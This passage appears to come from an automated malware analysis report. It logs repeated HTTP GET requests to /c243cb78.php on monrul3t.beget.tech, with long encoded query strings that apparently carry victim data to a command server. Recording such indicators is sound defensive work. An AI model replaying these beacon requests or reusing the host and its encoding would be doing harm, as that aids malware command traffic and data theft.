0MjpWT4tGROhXUE5EbSpnT00keNpXQq5UbOJTT3FFRNNTSU1UbCpWSzl0UKdXSp9UaR1mT0k1RNlmWU1UaGdVW4V1VNVTVqllaWdlT5V1RPdXQU1kMVpnTqZ1RNhmUUlVNJ1WWtplaJNXSTpENrpWS2k0QNFTUU1kMZRkTyUEVPtmU610dJ1mW6llaaBzZU5ENRd1TqZkaaBTQUlFaa1mTsZlaORTV61Ua3lWSvkUaPlWUql1MV1WWqZ1VNpmV61kMBpnTrxGVNpmSH9UbSdkTyklMNhXTUpVeVRVTzkFVNRTWH90MnpWSzlUeQl2bql0dnRkWxE1RadXRE1UeVR0T1UlMZhmUy4UbCRlW0U1VZhXRy00MNpmT0kVbOBzaU10akRUT4l0QMlWTYJ2ZrpXTp9maJRzZU5Uaa1WTw0kaZpmVX10MJJTT5F1RaJTRyk1aGpmTsJlMOxmUtpVaO1mTsJkeO1mUql1aKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJhkTwQFRKpWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpNGROpXV610dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiIjNWYmZmYkJmMzYDMxUDM1QWO2E2MmVWOxgjYjlTZjNDNiZGO3UjN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=0VfiIiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYisHL9JCMYZWaZpXT20ERNZTVE1UavpWStpleONTUE9EbGRlTzUleNJTTy0UNVRlWpJVbZhXUq5ENRJjT0UkMOtmRtlFaKdVWsp1RapXSDxUaVNUT6lUaPl2aE1EeZR1TppEVNtmRt50MjpWT4tGROhXUE5EbSpnT00keNpXQq5UbOJTT3FFRNNTSU1UbCpWSzl0UKdXSp9UaR1mT0k1RNlmWU1UaGdVW4V1VNVTVqllaWdlT5V1RPdXQU1kMVpnTqZ1RNhmUUlVNJ1WWtplaJNXSTpUNrpWS2k0QNFTUU1kMZRkTyUEVPtmU610dJ1mW6llaaBzZU5ENRd1TqZkaaBTQUlFaa1mTsZlaORTV61Ua3lWSvkUaPlWUql1MV1WWqZ1VNpmV61kMBpnTrxGVNpmSH9UbSdkTyklMNhXTUpVeVRVTzkFVNRTWH90MnpWSzlUeQl2bql0dnRkWxE1RadXRE1UeVR0T1UlMZhmUy4UbCRlW0U1VZhXRy00MNpmT0kVbOBzaU10akRUT4l0QMlWTYJ2ZrpXTp9maJRzZU5Uaa1WTw0kaZpmVX10MJJTT5F1RaJTRyk1aGpmTsJlMOxmUtpVaO1mTsJkeO1mUql1aKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJhkTwQFRKpWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0